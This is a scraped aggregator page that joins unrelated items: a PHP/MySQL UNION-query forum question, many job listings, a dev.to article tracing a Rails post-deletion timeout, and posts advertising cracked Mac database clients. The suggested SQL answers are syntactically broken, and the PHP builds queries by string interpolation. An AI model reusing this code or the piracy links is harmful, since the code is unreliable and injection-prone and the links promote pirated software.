"SELECT SUM(cntTotal) as total FROM CBS_WO WHERE (date BETWEEN '$monthSecond' AND '$monthEnd') AND t_port = '$t_port' AND t_id = '$t_id' UNION SELECT SUM(cntTotal) as total FROM CNT_MODS WHERE (date BETWEEN '$monthSecond' AND '$monthEnd') AND t_port = '$t_port' AND t_id = '$t_id'"

This query seems to work in phpMyAdmin as I get 2 rows. (1 for each table), logically I used a WHILE loop in PHP to add the two rows together. After echo'ing out each row manually I discovered my second row isn't showing up in the loop, yet it does in the query?

Can't figure out why this is happening, I am certain it's something silly but I been at this code for over 16hrs already and need a new set of eyes.

PHP CODE

function periodTotal() { include('/sql.login.php'); $t_id = "1271"; $t_port = "101"; $date = date("Y-m-d"); # FIND MONTH (DATE) $monthStart = date("Y-m-d", strtotime(date('m').'/01/'.date('Y').' 00:00:00')); $monthFirst = date("Y-m-d", strtotime('-1 second',strtotime('+15 days',strtotime(date('m').'/01/'.date('Y').' 00:00:00')))); $monthSecond = date("Y-m-d", strtotime('-1 second',strtotime('+16 days',strtotime(date('m').'/01/'.date('Y').' 00:00:00')))); $monthEnd = date("Y-m-d", strtotime('-1 second',strtotime('+1 month',strtotime(date('m').'/01/'.date('Y').' 00:00:00')))); if ($date = $monthFirst) { $sql = $dbh->prepare("SELECT SUM(cntTotal) as total FROM CBS_WO WHERE (date BETWEEN '$monthStart' AND '$monthFirst') AND t_port = '$t_port' AND t_id = '$t_id' UNION SELECT SUM(cntTotal) as total FROM CNT_MODS WHERE (date BETWEEN '$monthStart' AND '$monthFirst') AND t_port = '$t_port' AND t_id = '$t_id'"); $sql->execute(); } else { $sql = $dbh->prepare("SELECT SUM(cntTotal) as total FROM CBS_WO WHERE (date BETWEEN '$monthSecond' AND '$monthEnd') AND t_port = '$t_port' AND t_id = '$t_id' UNION SELECT SUM(cntTotal) as total FROM CNT_MODS WHERE (date BETWEEN '$monthSecond' AND '$monthEnd') AND t_port = '$t_port' AND t_id = '$t_id'"); $sql->execute(); } while($row = $sql->fetch(PDO::FETCH_ASSOC)) { $total += $row['total']; } return $total; }

Does this work for you?

SELECT SUM(`total`) as `total` FROM (( SELECT SUM(cntTotal) as total FROM CBS_WO WHERE (date BETWEEN '$monthSecond' AND '$monthEnd') AND t_port = '$t_port' AND t_id = '$t_id' ) UNION ( SELECT SUM(cntTotal) as total FROM CNT_MODS WHERE (date BETWEEN '$monthSecond' AND '$monthEnd') AND t_port = '$t_port' AND t_id = '$t_id'" )) as temp

This might be more efficient:

SELECT SUM(total) FROM ( SELECT cntTotal FROM CBS_WO WHERE (date BETWEEN '$monthSecond' AND '$monthEnd') AND t_port = '$t_port' AND t_id = '$t_id' ) UNION ( SELECT cntTotal FROM CNT_MODS WHERE (date BETWEEN '$monthSecond' AND '$monthEnd') AND t_port = '$t_port' AND t_id = '$t_id'" ) as temp

(only has one SUM ) but you'd have to test it.


          Shifting Moodle to AWS from VPS (CPanel)      Cache   Translate Page      
Hi, I have upload speed issue with Moodle application. Just wanted to shift on AWS ASAP. Thanks (Budget: $8 - $15 AUD, Jobs: Amazon Web Services, Linux, Moodle, MySQL, System Admin)
          Tableau Developer      Cache   Translate Page      
CA-Redwood City, Redwood City, California Skills : Tableau, SSRS development, Data visualization, SQL Server, Redshift, Athena, MySQL and Analytics Description : Required Qualifications: • 5-7 years of development experience in Tableau • 3-4 years of development experience in Tableau and SSRS development. • 2+ years of experience with BI UX design. • 2+ years of experience with Analytics. • Experience with data vi
          Web Marketing Specialist II      Cache   Translate Page      
AZ-Phoenix, Web Marketing Specialist II for Axway, Inc. (Phoenix, AZ) Responsible for app engg mngmnt & maintenance of marketing automation platforms. Reqs Bach in Info Tech, Comp Info Sys, Bus or rltd. Reqs 3 yrs of post-Bach exp which must include some exp w/: Web front-end develmnt using HTML, CSS, Javascript, JQuery; Web back-end develmnt using PHP, MySQL, Git; Responsive Web Design; troubleshooting or mo
          Sistema administrador de stock de inventario       Cache   Translate Page      
Necesito un sitio web nuevo. Ya tengo una base de datos, solo necesito que crees un sitio web para mi pequeña empresa. Con arquitectura mvc y utilizando php puro JavaScript html bootstrap, la db es mysql... (Budget: $10 - $30 USD, Jobs: AJAX, Graphic Design, MySQL, PHP, Website Design)
          Building a PHP base website      Cache   Translate Page      
1) PHP base CMS with mysql, suggestion Drupal 2) Need to consume existing site migrated content through JSON flat file from another CMS "CoreMedia" (Phase 1) 3) with forum and marketplace (Phase 2 & 3)... (Budget: $1500 - $3000 SGD, Jobs: Drupal, HTML, MySQL, PHP, Website Design)
          Sistema administrador de stock de inventario       Cache   Translate Page      
Necesito un sitio web nuevo. Ya tengo una base de datos, solo necesito que crees un sitio web para mi pequeña empresa. Con arquitectura mvc y utilizando php puro JavaScript html bootstrap, la db es mysql... (Budget: $10 - $30 USD, Jobs: AJAX, Graphic Design, MySQL, PHP, Website Design)
          WOO COMMERCE EXPERTS ONLY PLZ .When customer checks out it stalls the website serevely      Cache   Translate Page      
This is the error shown by woo commerce system manager. ### WordPress Environment ### Home URL: https://xtremenutrition.co.za Site URL: https://xtremenutrition.co.za WC Version: 3.4.5 Log Directory Writable:... (Budget: $30 - $250 USD, Jobs: Linux, MySQL, PHP, WooCommerce, WordPress)
          Check Apache, php, .htaccess settings      Cache   Translate Page      
Quick help needed to check Apache, php, .htaccess settings (Budget: $10 USD, Jobs: Apache, Linux, MySQL, PHP, System Admin)
          Building a PHP base website      Cache   Translate Page      
1) PHP base CMS with mysql, suggestion Drupal 2) Need to consume existing site migrated content through JSON flat file from another CMS "CoreMedia" (Phase 1) 3) with forum and marketplace (Phase 2 & 3)... (Budget: $1500 - $3000 SGD, Jobs: Drupal, HTML, MySQL, PHP, Website Design)
          WOO COMMERCE EXPERTS ONLY PLZ .When customer checks out it stalls the website serevely      Cache   Translate Page      
This is the error shown by woo commerce system manager. ### WordPress Environment ### Home URL: https://xtremenutrition.co.za Site URL: https://xtremenutrition.co.za WC Version: 3.4.5 Log Directory Writable:... (Budget: $30 - $250 USD, Jobs: Linux, MySQL, PHP, WooCommerce, WordPress)
          Check Apache, php, .htaccess settings      Cache   Translate Page      
Quick help needed to check Apache, php, .htaccess settings (Budget: $10 USD, Jobs: Apache, Linux, MySQL, PHP, System Admin)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          PHP - Module Lead - Mphasis - Bengaluru, Karnataka      Cache   Translate Page      
Total 6 – 8 years related experience in IT • Professional experience in PHP/MySQL (LAMP) stack development – 5 years ( 7 for senior) • Professional experience...
From Mphasis - Thu, 27 Sep 2018 12:28:53 GMT - View all Bengaluru, Karnataka jobs
          Magento developer urgent      Cache   Translate Page      
I need my website re-configured.I need you to design and build my online store. (Budget: $2 - $8 USD, Jobs: MySQL, PHP, Shopify, System Admin, WordPress)
          Selling car parts based on tecdoc      Cache   Translate Page      
I want a website where I can sell car parts based on registration number lookup, such as eurodel.no (Budget: $25 - $50 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Adriod Developer - vikas Global Solutions Ltd - Madhavanpark, Karnataka      Cache   Translate Page      
Android Application Development, Android SDK’s, API, HTML,CSS, MYSQL. Android Application Development. Vikas Global Solutions Ltd....
From Indeed - Mon, 10 Sep 2018 05:26:38 GMT - View all Madhavanpark, Karnataka jobs
          Seleccionar select con el id insertado en la bbdd con php, mysql      Cache   Translate Page      

Seleccionar select con el id insertado en la bbdd con php, mysql

Respuesta a Seleccionar select con el id insertado en la bbdd con php, mysql

Hola,

si al dar error muestra el mensaje correctamente de "Ocurrió un problema con el servidor" significa que recibes por jQuery el valor de "$this->mensaje" por lo que deberías sustituir $this->mensaje = 1; por $this->mensaje = $idcon->lastInsertId(); donde mostrará el id del último insertado.

No se si es lo que necesitas pero prueba a ver ;)

Publicado el 10 de Octubre del 2018 por santi

          Wordpress Developer proficient in Divi, SVN and MySQL      Cache   Translate Page      
We are looking for a reliable, punctual Wordpress Developer to assist with multiple ongoing website developments. Fluent English a must. MUST be adept in SVN, Wordpress and MySQL Proficient in using Divi... (Budget: $400 - $450 AUD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Wordpress Developer proficient in Divi, SVN and MySQL      Cache   Translate Page      
We are looking for a reliable, punctual Wordpress Developer to assist with multiple ongoing website developments. Fluent English a must. MUST be adept in SVN, Wordpress and MySQL Proficient in using Divi... (Budget: $400 - $450 AUD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Adriod Developer - vikas Global Solutions Ltd - Madhavanpark, Karnataka      Cache   Translate Page      
Android Application Development, Android SDK’s, API, HTML,CSS, MYSQL. Android Application Development. Vikas Global Solutions Ltd....
From Indeed - Mon, 10 Sep 2018 05:26:38 GMT - View all Madhavanpark, Karnataka jobs
          Navicat Premium 12.1.9 Mac 破解版 – Mac上最强大的数据库客户端      Cache   Translate Page      
Navicat是最优秀的数据库图形化管理客户端,支持MySQL、SQL Server、SQLite、Oracle 和 PostgreSQL 等数据库,支持数据库建模,正向和反向工程,数据同步等功能,而Premium版本是包含了Navicat所有功能的最强大版本,是首选的数据库客户端工具!
          SQLPro Studio 1.0.302 Mac 破解版 – 优秀的数据库客户端      Cache   Translate Page      
SQLPro Studio 是一款Mac上优秀的数据库客户端,支持Postgres, MySQL,Microsoft SQL Server,Oracle等主流数据库,可以方便易用的管理数据库,很不错!
          Has pmm's mysqld_exporter been redeveloped? or the same as on github?      Cache   Translate Page      
Has pmm's mysqld_exporter been redeveloped? or the same as on github? https://github.com/prometheus/mysqld_exporter
          woocommerce reporting      Cache   Translate Page      
We need to query woocommerce sales by a date range and by a custom field called _supplier. The script will include a list of current suppliers that can be selected. The date is then selected. For example, last month, last 4 months, or last 12 months... (Budget: $30 - $250 USD, Jobs: MySQL, PHP, Software Architecture, WooCommerce, WordPress)
          [lubuntu] What's the proper way to upgrade from MySQL 5.7 to MariaDB 10.1 on 18.04.1      Cache   Translate Page      
I have a server running in my house and noticed that it still had MySQL 5.7 on it even after I upgraded t0 18.04. So, I decided to take a crack at upgrading to MariaDB. Most of the guides I found told to backup my databases, stop mysqld, and then remove mysql-server and mysql-client. Then...
          می خواهم Nginx, MySQL, PHP را روی سیستم‌عامل CentOS کانفیگ کنم      Cache   Translate Page      

سلام دوستان؛ همان طور که می دانید Nginx یک نرم افزار مبتنی بر وب و اپن سورس است و با  PHP v7 یعنی آخرین نسخه پی اچ پی که تاکنون موجود است، سازگار می باشد. در این آموزش، قصدا داریم LEMP (لینوکس، ENginx، MySQL، PHP) را بررسی کنیم.  تمام این موارد روی سیستم عامل CentOS پیاده […]

The post می خواهم Nginx, MySQL, PHP را روی سیستم‌عامل CentOS کانفیگ کنم appeared first on وب داده.


          2018 epub$ Learning MySQL and MariaDB: Heading in the Right Direction with MySQL and MariaDB Full [Pages] 7375634      Cache   Translate Page      

Learning MySQL and MariaDB: Heading in the Right Direction with MySQL and MariaDB Download at => https://collbookspdfmurahbanget9ki34.blogspot.com/1449362907
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Come with me on a journey through this website's source code by way of a bug      Cache   Translate Page      

This article started because I thought that researching a particular bug could be useful to understand devto's source code a little better. So I literally wrote this while doing the research and I ended up writing about other things as well. Here we go.

The bug I'm referring to is called Timeouts when deleting a post on GitHub. As the title implies, removing a post results in a server timeout which results in an error to the user. @peter in his bug report added a couple of details we need to keep present for our "investigation": this bug doesn't always happens (which would be better in the context of finding a solution, deterministic is always better) and it more likely presents itself with articles that have many reactions and comments.

First clues: it happens sometimes and usually with articles with a lot of data attached.

Let's see if we can dig up more information before diving into the code.

A note: I'm writing this post to explain (and expand) the way I researched this while it happened at the same time (well, over the course of multiple days but still at the same time :-D), so all discoveries were new to me when I wrote about them as they are to you if you read this.

Another note: I'm going to use the terms "async" and "out of process" interchangeably here. Async in this context means "the user doesn't wait for the call to be executed" not "async" as in JavaScript. A better term should be "out of process" because these asynchronous calls are executed by an external process through a queue on the database with a library/gem called delayed job.

Referential integrity

ActiveRecord (Rails's ORM), like many other object relational mappers, is an object layer that sits on top of a relational database system. Let's take a little detour and talk a little about a fundamental feature to preserve data meaningfulness in database systems: referential integrity. Why not, the bug can wait!

Referential integrity, to simplify a lot, is a defense against developers with weird ideas on how to structure their relational data. It forbids insertion of rows that have no correspondence in the primary table of the relationship. In layman terms it guarantees that there is a correspondent row in the relationship: if you have a table with a list of 10 cities, you shouldn't have a customer whose address belongs to an unknown city. Funnily enough it took more than a decade for MySQL to activate referential integrity by default, while PostgreSQL had it for 10 years already, at the time. Sometimes I think that MySQL in its early incarnations was a giant collection of CSV files with SQL on top. I'm joking, maybe.

With referential integrity in place you can rest (mostly) assured that the database won't let you add zombie rows, will keep the relationship updated and will clean up after you if you tell it to.

How do you instruct the database to do all of these things? It's quite simple. I'll use an example from PostgreSQL 10 documentation:

CREATE TABLE products (
    product_no integer PRIMARY KEY,
    name text,
    price numeric
);

CREATE TABLE orders (
    order_id integer PRIMARY KEY,
    shipping_address text,
);

CREATE TABLE order_items (
    product_no integer REFERENCES products ON DELETE RESTRICT,
    order_id integer REFERENCES orders ON DELETE CASCADE,
    quantity integer,
    PRIMARY KEY (product_no, order_id)
);

The table order_items has two foreign keys, one towards orders and another that points to products (a classic example of many-to-many in case you're wondering).

Wnen you design tables like this you should ask yourself the following questions (in addition to the obvious ones like "what am I really doing with this data?"):

  • what happens if a row in the primary table is deleted?

  • do I want to delete all the related rows?

  • do I want to set the referencing column to NULL ? in that case what does it mean for my business logic? does NULL even make sense for my data?

  • do I want to set the column to its default value? what does it mean for my business logic? does this column even have a default value?

If you look back at the example what we're telling the database are the following two things:

  • products cannot be removed, unless they do not appear in any order

  • orders can be be removed at all times, and they take the items with them to the grave 😀

Keep in mind that removal in this context is still a fast operation, even in a context like dev.to's if an article were to have tables linked with a cascade directive, it should still be a fast operation. DBs tend to become slow when a single DELETE triggers millions (or tens of millions) of other removals. I assume this is not the case (yet or in the future) but since the point of this whole section is to expand our knowledge about referential integrity and not to actually investigate the bug, let's keep on digging.

Next we open the console and check if the tables are linked to each other, using psql :

$ rails dbconsole
psql (10.5)
Type "help" for help.

PracticalDeveloper_development=# \d+ articles
...
Indexes:
    "articles_pkey" PRIMARY KEY, btree (id)
    "index_articles_on_boost_states" gin (boost_states)
    "index_articles_on_featured_number" btree (featured_number)
    "index_articles_on_hotness_score" btree (hotness_score)
    "index_articles_on_published_at" btree (published_at)
    "index_articles_on_slug" btree (slug)
    "index_articles_on_user_id" btree (user_id)

This table has a primary key, a few indexes but apparently no foreign key constraints (the indicators for referential integrity). Compare it with a table that has both:

PracticalDeveloper_development=# \d users
...
Indexes:
    "users_pkey" PRIMARY KEY, btree (id)
    "index_users_on_confirmation_token" UNIQUE, btree (confirmation_token)
    "index_users_on_reset_password_token" UNIQUE, btree (reset_password_token)
    "index_users_on_username" UNIQUE, btree (username)
    "index_users_on_language_settings" gin (language_settings)
    "index_users_on_organization_id" btree (organization_id)
Referenced by:
    TABLE "messages" CONSTRAINT "fk_rails_273a25a7a6" FOREIGN KEY (user_id) REFERENCES users(id)
    TABLE "badge_achievements" CONSTRAINT "fk_rails_4a2e48ca67" FOREIGN KEY (user_id) REFERENCES users(id)
    TABLE "chat_channel_memberships" CONSTRAINT "fk_rails_4ba367990a" FOREIGN KEY (user_id) REFERENCES users(id)
    TABLE "push_notification_subscriptions" CONSTRAINT "fk_rails_c0b1e39717" FOREIGN KEY (user_id) REFERENCES users(id)

This is what we learned so far: why referential integrity can come into play when you remove rows from a DB and that the articles table has no apparent relationships with any other table at the database level. But is this true in the web app? Let's move up one layer, diving into the Ruby code.

ps. in the case of Rails (don't remember since which version) you can also see which foreign keys you have defined by looking in the schema.rb file.

ActiveRecord, associations and callbacks

Now that we know what referential integrity is, how to identify it and now that we know it's not at play in this bug we can move up a layer and check how is the Article object defined (I'll skip stuff that I think it's not related to this article and the bug itself, altough I might be wrong because I don't know the code base well):

class Article < ApplicationRecord
  # ...

  has_many :comments,       as: :commentable
  has_many :buffer_updates
  has_many :reactions,      as: :reactable, dependent: :destroy
  has_many  :notifications, as: :notifiable

  # ...

  before_destroy    :before_destroy_actions

  # ...

  def before_destroy_actions
    bust_cache
    remove_algolia_index
    reactions.destroy_all
    user.delay.resave_articles
    organization&.delay&.resave_articles
  end
end

A bunch of new information from that piece of code:

  • Rails (but not the DB) knows that an article can have many comments, buffer updates, reactions and notifications (these are called "associations" in Rails lingo)

  • Reactions are explictly dependent on the articles and they will be destroyed if the article is removed

  • There's a callback that does a bunch of stuff (we'll explore it later) before the object and its row in the database are destroyed

  • Three out of four associations are the able type, Rails calls these polymorphic associations because they allow the programmer to associate multiple types of objects to the same row, using two different columns (a string with the name of the model type the object belongs to and an id). They are very handy, though I always felt they make the database very dependent on the domain model (set by Rails). They can also require a composite index in the associated table to speed up queries

Similarly to what the underlying database system can do, ActiveRecord allows the developer to specify what happens to the related objects when the primary one is destroyed. According to the documentation Rails supports: destroying all related objects, deleting all related objects, setting the foreign key to NULL or restricting the removal with an error. The difference between destroy and delete is that in the former case all related callbacks are executed prior to removal, in the latter one the callbacks are skipped and only the row in the DB is removed.

The default strategy for the relationships without a dependent is to do nothing, which means leaving the referenced rows there in place. If it were up to me the default would be the app doesn't start until you decided what to do with the linked models but I'm not the person who designed ActiveRecord.

Keep in mind that the database trumps the code, if you define nothing at the Rails level but the database is configured to automatically destroy all related rows, then the rows will be destroyed. This is one of the many reasons why it's worth taking the time to learn how the DB works :-)

The last bit we haven't talked about the model layer is the callback which is probably where the bug manifests itself.

The infamous callback

This before destroy callback will execute prior to issuing the DELETE statement to the DB:

def before_destroy_actions
  bust_cache
  remove_algolia_index
  reactions.destroy_all
  user.delay.resave_articles
  organization&.delay&.resave_articles
end

Cache busting

The first thing the callback does is call the method bust_cache which in turn calls sequentially six times the Fastly API to purge the article's cache (each call to bust is two HTTP calls). It also does a cospicuos number of out of process calls to the same API (around 20-50, depends on the status of the article and the number of tags) but these don't matter because the user won't wait for them.

One thing to annotate: six HTTP calls are always going out after you press the button to delete an article.

Index removal

dev.to uses Algolia for search, the call remove_algolia_index does the following:

  • calls algolia_remove_from_index! which in turns calls the "async" version of the Algolia HTTP API which in reality does a (fast) synchronous call to Algolia without waiting for the index to be cleared on their side. It's still a synchronous call subject adding to the user's latency

  • calls Algolia's HTTP API other two times for other indexes

So, adding the previous 6 HTTP calls for Fastly, we're at 9 APIs called in process

Reactions destruction

The third step is reactions.destroy_all which as the call implies destroys all the reactions to the article. In Rails destroy_all simply iterates on all the objects and calls destroy on each of them which in turn activate all the "destroy" callbacks for proper cleanup. The Reaction model has two before_destroy callbacks:

class Reaction < ApplicationRecord
  # ...

  before_destroy :update_reactable_without_delay
  before_destroy :clean_up_before_destroy

  # ...
end

I had to dig a little bit to find out what the first one does (one of the things I dislike about the Rails way of doing things are the magical methods popping up everywhere, they make refactoring harder and they encourage coupling between the model and all the various gems). update_reactable_without_delay calls update_reactable (which has been declared as an async function by default) bypassing the queue. The result is a standard inline call the user waits for.

  • update_reactable recalculates (this time out of process), the scores of the Article (a thing that should probably be avoided since the Article is up for removal) if the article has been published. Then (back inline) it reindexes the article (twice) calling Algolia, removes the reactions from Fastly's cache (each call to bust the cache is two Fastly's calls), busts another cache (two more HTTP calls) and possibly updates a column on the Article (which is probably not needed since it's going to be removed). The total is 6 HTTP calls: one async HTTP calls (the first one to Algolia), one other call to Algolia and four to Fastly. Let's annotate down the 5 the user has to wait for.

  • clean_up_before_destroy reindexes the article on Algolia (a third time).

Let's sum up: a removal of a reaction amounts to 6 HTTP calls. If the article has a 100 reactions... well you can do the math.

Let's say the article had 1 reaction, plus the calls tallied before we're at around 15 HTTP calls:

  • 6 to bust the cache of the article

  • 3 to remove the article from the index

  • 6 for the reaction attached to the article

There's an additional bonus HTTP call that I've identified by chance using a gist to debug net/http calls, it calls the Stream.io API to delete the reaction from the user's feed. A total of 16 HTTP calls.

This is what happens when a reaction is destroyed (I added the awesome gem httplog to my local installation):

[httplog] Sending: PUT https://REDACTED.algolia.net/1/indexes/Article_development/25
[httplog] Data: {"title":" The Curious Incident of the Dog in the Night-Time"}
[httplog] Connecting: REDACTED.algolia.net:443
[httplog] Status: 200
[httplog] Benchmark: 0.357128 seconds
[httplog] Response:
{"updatedAt":"2018-10-09T17:23:44.151Z","taskID":945887592,"objectID":"25"}

[httplog] Sending: PUT https://REDACTED.algolia.net/1/indexes/searchables_development/articles-25
[httplog] Data: {"title":" The Curious Incident of the Dog in the Night-Time","tag_list":["discuss","security","python","beginners"],"main_image":"https://pigment.github.io/fake-logos/logos/medium/color/8.png","id":25,"featured":true,"published":true,"published_at":"2018-09-30T07:44:48.530Z","featured_number":1538293488,"comments_count":1,"reactions_count":0,"positive_reactions_count":0,"path":"/willricki/-the-curious-incident-of-the-dog-in-the-night-time-3e4b","class_name":"Article","user_name":"Ricki Will","user_username":"willricki","comments_blob":"Waistcoat craft beer pickled vice seitan kombucha drinking. 90's green juice hoodie.","body_text":"\n\nMeggings tattooed normcore kitsch chia. Fixie migas etsy hashtag jean shorts neutra pork belly. Vice salvia biodiesel portland actually slow-carb loko chia. Freegan biodiesel flexitarian tattooed.\n\n\nNeque. \n\n\nBefore they sold out diy xoxo aesthetic biodiesel pbr\u0026amp;b. Tumblr lo-fi craft beer listicle. Lo-fi church-key cold-pressed.\n\n\n","tag_keywords_for_search":"","search_score":153832,"readable_publish_date":"Sep 30","flare_tag":{"name":"discuss","bg_color_hex":null,"text_color_hex":null},"user":{"username":"willricki","name":"Ricki Will","profile_image_90":"/uploads/user/profile_image/6/22018b1a-7afa-47c1-bbae-b829977828e4.png"},"_tags":["discuss","security","python","beginners","user_6","username_willricki","lang_en"]}
[httplog] Status: 200
[httplog] Benchmark: 0.031995 seconds
[httplog] Response:
{"updatedAt":"2018-10-09T17:23:44.426Z","taskID":945887612,"objectID":"articles-25"}

[httplog] Sending: PUT https://REDACTED.algolia.net/1/indexes/ordered_articles_development/articles-25
[httplog] Data: {"title":" The Curious Incident of the Dog in the Night-Time","path":"/willricki/-the-curious-incident-of-the-dog-in-the-night-time-3e4b","class_name":"Article","comments_count":1,"tag_list":["discuss","security","python","beginners"],"positive_reactions_count":0,"id":25,"hotness_score":153829,"readable_publish_date":"Sep 30","flare_tag":{"name":"discuss","bg_color_hex":null,"text_color_hex":null},"published_at_int":1538293488,"user":{"username":"willricki","name":"Ricki Will","profile_image_90":"/uploads/user/profile_image/6/22018b1a-7afa-47c1-bbae-b829977828e4.png"},"_tags":["discuss","security","python","beginners","user_6","username_willricki","lang_en"]}
[httplog] Status: 200
[httplog] Benchmark: 0.047077 seconds
[httplog] Response:
{"updatedAt":"2018-10-09T17:23:44.494Z","taskID":945887622,"objectID":"articles-25"}

[httplog] Sending: PUT https://REDACTED.algolia.net/1/indexes/Article_development/25
[httplog] Data: {"title":" The Curious Incident of the Dog in the Night-Time"}
[httplog] Status: 200
[httplog] Benchmark: 0.029352 seconds
[httplog] Response:
{"updatedAt":"2018-10-09T17:23:44.541Z","taskID":945887632,"objectID":"25"}

[httplog] Sending: PUT https://REDACTED.algolia.net/1/indexes/searchables_development/articles-25
[httplog] Data: {"title":" The Curious Incident of the Dog in the Night-Time","tag_list":["discuss","security","python","beginners"],"main_image":"https://pigment.github.io/fake-logos/logos/medium/color/8.png","id":25,"featured":true,"published":true,"published_at":"2018-09-30T07:44:48.530Z","featured_number":1538293488,"comments_count":1,"reactions_count":0,"positive_reactions_count":1,"path":"/willricki/-the-curious-incident-of-the-dog-in-the-night-time-3e4b","class_name":"Article","user_name":"Ricki Will","user_username":"willricki","comments_blob":"Waistcoat craft beer pickled vice seitan kombucha drinking. 90's green juice hoodie.","body_text":"\n\nMeggings tattooed normcore kitsch chia. Fixie migas etsy hashtag jean shorts neutra pork belly. Vice salvia biodiesel portland actually slow-carb loko chia. Freegan biodiesel flexitarian tattooed.\n\n\nNeque. \n\n\nBefore they sold out diy xoxo aesthetic biodiesel pbr\u0026amp;b. Tumblr lo-fi craft beer listicle. Lo-fi church-key cold-pressed.\n\n\n","tag_keywords_for_search":"","search_score":154132,"readable_publish_date":"Sep 30","flare_tag":{"name":"discuss","bg_color_hex":null,"text_color_hex":null},"user":{"username":"willricki","name":"Ricki Will","profile_image_90":"/uploads/user/profile_image/6/22018b1a-7afa-47c1-bbae-b829977828e4.png"},"_tags":["discuss","security","python","beginners","user_6","username_willricki","lang_en"]}
[httplog] Status: 200
[httplog] Benchmark: 0.028819 seconds
[httplog] Response:
{"updatedAt":"2018-10-09T17:23:44.612Z","taskID":945887642,"objectID":"articles-25"}

[httplog] Sending: PUT https://REDACTED.algolia.net/1/indexes/ordered_articles_development/articles-25
[httplog] Data: {"title":" The Curious Incident of the Dog in the Night-Time","path":"/willricki/-the-curious-incident-of-the-dog-in-the-night-time-3e4b","class_name":"Article","comments_count":1,"tag_list":["discuss","security","python","beginners"],"positive_reactions_count":1,"id":25,"hotness_score":153829,"readable_publish_date":"Sep 30","flare_tag":{"name":"discuss","bg_color_hex":null,"text_color_hex":null},"published_at_int":1538293488,"user":{"username":"willricki","name":"Ricki Will","profile_image_90":"/uploads/user/profile_image/6/22018b1a-7afa-47c1-bbae-b829977828e4.png"},"_tags":["discuss","security","python","beginners","user_6","username_willricki","lang_en"]}
[httplog] Status: 200
[httplog] Benchmark: 0.02821 seconds
[httplog] Response:
{"updatedAt":"2018-10-09T17:23:44.652Z","taskID":945887652,"objectID":"articles-25"}

[httplog] Connecting: us-east-api.stream-io-api.com:443
[httplog] Sending: DELETE http://us-east-api.stream-io-api.com:443/api/v1.0/feed/user/10/Reaction:7/?api_key=REDACTED&foreign_id=1
[httplog] Data:
[httplog] Status: 200
[httplog] Benchmark: 0.336152 seconds
[httplog] Response:
{"removed":"Reaction:7","duration":"17.84ms"}

If you countn them they are 7, not 16. That's because the calls to Fastly are only executed in production.

Resaving articles

User.resave_articles refreshes the user's other articles and is called out of process so it's not interesting to us right now. The same happens to the organization if the article is part of one but again, so we don't care.

Let's recap what we know so far. Each article removal triggers a callback that does a lot of things that touch third party services that help this website be as fast as it is and it also updates various counters I didn't really investigate :-D.

What happens when the article is removed

After the callback has been dealt with and all the various caches are up to date and the reactions are gone from the database, we still need to check what happens to the other associations of the article we're removing. As you recall every article can possibly have comments, reactions (gone by now), buffer updates (not sure what they are) and notifications.

Let's see what happens when we destroy an article to see if we can get other clues. I replaced a long log with my summaries:

> art = Article.last # article id 25
> art.destroy!
# its tags are destroyed, this is handled by "acts_as_taggable_on :tags"...
# a bunch of other tag related stuff happens, 17 select calls...
# the aforamentioned HTTP calls for each reaction are here too...
# there's a SQL DELETE for each reaction...
# the user object is updated...
# a couple of other UPDATEs I didn't investigate but which seem really plausible...
# the HTTP calls to remove the article itself from search...
# the article is finally deleted from the db...
# the article count for the user is updated

Aside from the fact that in my initial overview I totally forgot about the destruction of the tags (they amount to a DELETE and an UPDATE each to the database) I would say there's a lot going on when an article is removed.

What happens to the rest of the objects we didn't find in the console?

If you remember from what I said earlier, in Rails relationships everything not marked explicitly as "dependent" survives the destruction of the primary object, so they all are in the DB:

PracticalDeveloper_development=# select count(*) from comments where commentable_id = 25;
 count
-------
     3
PracticalDeveloper_development=# select count(*) from notifications where notifiable_id = 25;
 count
-------
     2
PracticalDeveloper_development=# select count(*) from buffer_updates where article_id = 25;
 count
-------
     1

I think we can be a little bit confident that the issue that sparked this article is likely to manifest if such article is really popular before being removed having many reactions, comments and notifications.

Timeout

Another factor that I mentioned in a comment to the issue is the Heroku's default timeout setting. dev.to IIRC runs on Heroku, which has a 30 seconds timeout for HTTP calls once the router has processed them (so it's a timer for your app code). If the app doesn't respond in 30 seconds, it timeouts and sends an error.

dev.to, savvily, cuts this timeout in half using rack timeout default service timeout which is 15 seconds.

In brief: if after hitting the "remove article" button the server doesn't finish in 15 seconds, a timeout error is raised. Having seen that a popular article can possibly trigger dozens of HTTP calls, you can understand why in some cases the 15 seconds wall can be hit.

Recap

Let's recap what we learned so far about what happens when an article is removed:

  • referential integrity can be a factor if the article has millions of related rows (unlikely in this scenario)

  • Rails removing associated objects sequentially is a factor (considering that it also has to load such objects from the DB to the ORM before removing them because it has to if it wants to trigger the various callbacks)

  • Inline callbacks and HTTP calls are another factor

  • Rails is not smart at all because it could decrease the amount of calls to the DB (for example by buffering the DELETE statements for all reactions and using a IN clause)

  • Rails magic is sometimes annoying 😛

Possible solutions

This is where I stop for now because I'm not familiar with the code base (well, after this definitely more :D) and because I think it could be an interesting "collective" exercise since it's not a critical bug that needs to be fixed "yesterday".

At first the simplest solution that could pop up in a one's mind is to move everything that happens inline when an article is removed in a out of process call by delegating everything to a job that is going to be picked up by the queue manager. The user just needs the article gone from their view after all. The proper removal can happen with a worker process. Aside from the fact that I'm not sure I considered everything that's going on (I found out about tags by chance as you saw) and all the implications, I think this is just a quick win. It would fix the user's problem by swiping the reported issue under the rug.

